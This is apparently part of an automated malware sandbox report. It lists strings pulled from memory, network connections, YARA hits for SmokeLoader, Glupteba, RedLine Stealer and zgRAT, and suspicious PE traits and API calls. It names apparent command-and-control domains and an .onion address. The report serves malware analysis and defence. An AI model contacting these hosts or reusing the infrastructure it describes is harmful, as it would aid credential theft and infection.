Source: RegAsm.exe, 00000018.00000002.2356147989.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chincenterblandwka.pw/;
Source: RegAsm.exe, 00000018.00000002.2356147989.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chincenterblandwka.pw/C
Source: RegAsm.exe, 00000018.00000002.2356147989.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chincenterblandwka.pw/J
Source: RegAsm.exe, 00000018.00000002.2395130228.0000000003260000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2356147989.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2356147989.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chincenterblandwka.pw/api
Source: RegAsm.exe, 00000018.00000002.2356147989.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chincenterblandwka.pw/apin
Source: RegAsm.exe, 00000018.00000002.2356147989.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chincenterblandwka.pw/apiok
Source: RegAsm.exe, 00000018.00000002.2356147989.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chincenterblandwka.pw/apis
Source: RegAsm.exe, 00000018.00000002.2356147989.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2356147989.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chincenterblandwka.pw/ing_bi
Source: RegAsm.exe, 00000018.00000002.2356147989.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chincenterblandwka.pw:443/api
Source: 4854.exe, 00000004.00000000.1898749556.0000000000C41000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/v2/track
Source: 4854.exe, 00000004.00000002.1911380987.0000000004261000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dc.services.visualstudio.com/v2/trackVDequeueAndSend:
Source: 4854.exe, 00000004.00000000.1898749556.0000000000C41000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://devdiv.visualstudio.com/DevDiv/_git/VSTelemetryAPI
Source: nsa984B.tmp.exe, 0000001F.00000003.2363430208.0000000000ABA000.00000004.00000020.00020000.00000000.sdmp, CFAA.exe, 00000023.00000002.2932216955.00000000047DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: nsa984B.tmp.exe, 0000001F.00000003.2363430208.0000000000ABA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: CFAA.exe, 00000023.00000002.2932216955.00000000047DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabS
Source: nsa984B.tmp.exe, 0000001F.00000003.2363430208.0000000000ABA000.00000004.00000020.00020000.00000000.sdmp, CFAA.exe, 00000023.00000002.2932216955.00000000047DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000001.00000000.1669762259.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: https://github.com/Snawoot/opera-proxy/releases/download/v1.2.2/opera-proxy.windows-386.exeBlackBerr
Source: explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000001.00000000.1666612825.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000001.00000000.1669762259.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000001.00000000.1669762259.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: https://raw.githubusercontent.com/spesmilo/electrum/master/electrum/servers.jsonsize
Source: explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2778323463.000000000C09E000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2778323463.000000000C0AE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://statscreate.org
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2778323463.000000000C0EC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://statscreate.orghttp://petas4zb2nd4xmyo2bozkq3g7y2grljlf5sqxwsm5khywam6sierhxad.onion
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2778323463.000000000C0EE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://statscreate.orghttp://petas4zb2nd4xmyo2bozkq3g7y2grljlf5sqxwsm5khywam6sierhxad.onionSoftware
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2778323463.000000000C0AE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://statscreate.orghttp://petas4zb2nd4xmyo2bozkq3g7y2grljlf5sqxwsm5khywam6sierhxad.onionhttps://
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2778323463.000000000C09E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://statscreate.orghttps://statscreate.orgRegQueryValueExWhttps://statscreate.orgUUIDUUIDPGDSEPG
Source: nsa984B.tmp.exe, 0000001F.00000003.2582742088.0000000027127000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: nsa984B.tmp.exe, 0000001F.00000003.2582742088.0000000027127000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: 9E77.exe, 0000001E.00000003.2409625576.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp, nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000043C000.00000040.00000001.01000000.0000001C.sdmp, nsa984B.tmp.exe, 0000001F.00000003.2354627564.000000001A273000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000043C000.00000040.00000001.01000000.0000001C.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
Source: 9E77.exe, 0000001E.00000003.2456150443.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: 9E77.exe, 0000001E.00000003.2409625576.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp, nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000043C000.00000040.00000001.01000000.0000001C.sdmp, nsa984B.tmp.exe, 0000001F.00000003.2354627564.000000001A273000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: 9E77.exe, 0000001E.00000003.2456150443.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000043C000.00000040.00000001.01000000.0000001C.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003780000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://turnitin.com/robot/crawlerinfo.html)cannot
Source: 4854.exe, 00000004.00000002.1911380987.0000000004261000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://visualstudio-devdiv-c2s.msedge.net/ab
Source: explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1669762259.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000001.00000000.1669762259.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: RegSvcs.exe, 00000020.00000002.2620178999.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: nsa984B.tmp.exe, 0000001F.00000003.2363430208.0000000000ABA000.00000004.00000020.00020000.00000000.sdmp, CFAA.exe, 00000023.00000002.2932216955.00000000047DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: nsa984B.tmp.exe, 0000001F.00000003.2363430208.0000000000ABA000.00000004.00000020.00020000.00000000.sdmp, CFAA.exe, 00000023.00000002.2932216955.00000000047DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000043C000.00000040.00000001.01000000.0000001C.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000043C000.00000040.00000001.01000000.0000001C.sdmp	String found in binary or memory: https://www.mozilla.org/about/IIdkbN.exe
Source: nsa984B.tmp.exe, 0000001F.00000003.2582742088.0000000027127000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000043C000.00000040.00000001.01000000.0000001C.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000043C000.00000040.00000001.01000000.0000001C.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000043C000.00000040.00000001.01000000.0000001C.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0
Source: nsa984B.tmp.exe, 0000001F.00000003.2582742088.0000000027127000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: nsa984B.tmp.exe, 0000001F.00000003.2582742088.0000000027127000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: nsa984B.tmp.exe, 0000001F.00000003.2582742088.0000000027127000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000043C000.00000040.00000001.01000000.0000001C.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: nsa984B.tmp.exe, 0000001F.00000003.2582742088.0000000027127000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000043C000.00000040.00000001.01000000.0000001C.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1666612825.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000001.00000000.1666612825.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: 4854.exe, 00000004.00000000.1898749556.0000000000C41000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: 4854.exe, 00000004.00000000.1898749556.0000000000C41000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1666612825.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
Source: InstallSetup8.exe, 0000000D.00000002.3073092951.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://zonealarm.comhttps://www.kaspersky.comhttps://malwarebytes.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844

Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.231.140.225:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.47:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.47:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.47:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.47:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.47:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.47:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.47:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.47:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.47:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.47:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.47:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.47:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.4:49844 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: uVQLD8YVk6.exe, type: SAMPLE
Source: Yara match	File source: 0.2.uVQLD8YVk6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.toolspub2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.srvwauv.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.toolspub2.exe.5c15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.uVQLD8YVk6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.srvwauv.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1918764869.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2145002254.0000000000500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1676508085.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2145323149.0000000001F61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1676415097.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1919452397.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\srvwauv, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe

Code function: 10_2_0040571B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

10_2_0040571B

Source: dialer.exe, 00000022.00000003.2224899162.00000162B30E0000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: DirectInput8Create

memstr_629ed065-c

Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Window created: window name: CLIPBRDWNDCLASS

Source: dialer.exe, 00000022.00000003.2224899162.00000162B30E0000.00000004.00000001.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_40f70d3c-2

Source: Yara match	File source: 34.3.dialer.exe.162b33c0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.dialer.exe.162b30e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.3.dialer.exe.162b30e0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000022.00000003.2224899162.00000162B30E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000003.2232045068.00000162B33C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dialer.exe PID: 7056, type: MEMORYSTR

E-Banking Fraud

Yara detected Glupteba

Source: Yara match	File source: 15.3.31839b57a4f11171d6abc8bbc4451ee4.exe.3780000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.31839b57a4f11171d6abc8bbc4451ee4.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.31839b57a4f11171d6abc8bbc4451ee4.exe.2e90e67.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000003.2066199382.0000000003BC2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2724435477.00000000032D3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2567693218.0000000000843000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 31839b57a4f11171d6abc8bbc4451ee4.exe PID: 7216, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 35.2.CFAA.exe.2f0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 4.0.4854.exe.aa0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 31.2.nsa984B.tmp.exe.8b0e67.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000003.00000002.1918764869.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000011.00000002.2145002254.0000000000500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000F.00000002.2702934288.0000000002A89000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1676508085.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000011.00000002.2145323149.0000000001F61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000E.00000002.2067327627.00000000006BC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1676415097.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000001F.00000002.3074108822.00000000009FC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001F.00000002.3071615615.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000003.00000002.1919452397.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Drops large PE files

Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	File dump: datapumpcrt.exe.29.dr 273342460			Jump to dropped file
Source: C:\Program Files (x86)\DataPumpCRT\datapumpcrt.exe	File dump: Bytematrix74.exe.40.dr 273342460			Jump to dropped file

PE file contains section with special chars

Source: CFAA.exe.1.dr	Static PE information: section name:
Source: CFAA.exe.1.dr	Static PE information: section name:
Source: CFAA.exe.1.dr	Static PE information: section name:

PE file has a writeable .text section

Source: uVQLD8YVk6.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\uVQLD8YVk6.exe	Code function: 0_2_00401493 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401493
Source: C:\Users\user\Desktop\uVQLD8YVk6.exe	Code function: 0_2_00402305 NtQuerySystemInformation,	0_2_00402305
Source: C:\Users\user\Desktop\uVQLD8YVk6.exe	Code function: 0_2_00401410 NtAllocateVirtualMemory,	0_2_00401410
Source: C:\Users\user\Desktop\uVQLD8YVk6.exe	Code function: 0_2_00402312 NtQuerySystemInformation,	0_2_00402312
Source: C:\Users\user\Desktop\uVQLD8YVk6.exe	Code function: 0_2_004014C3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014C3
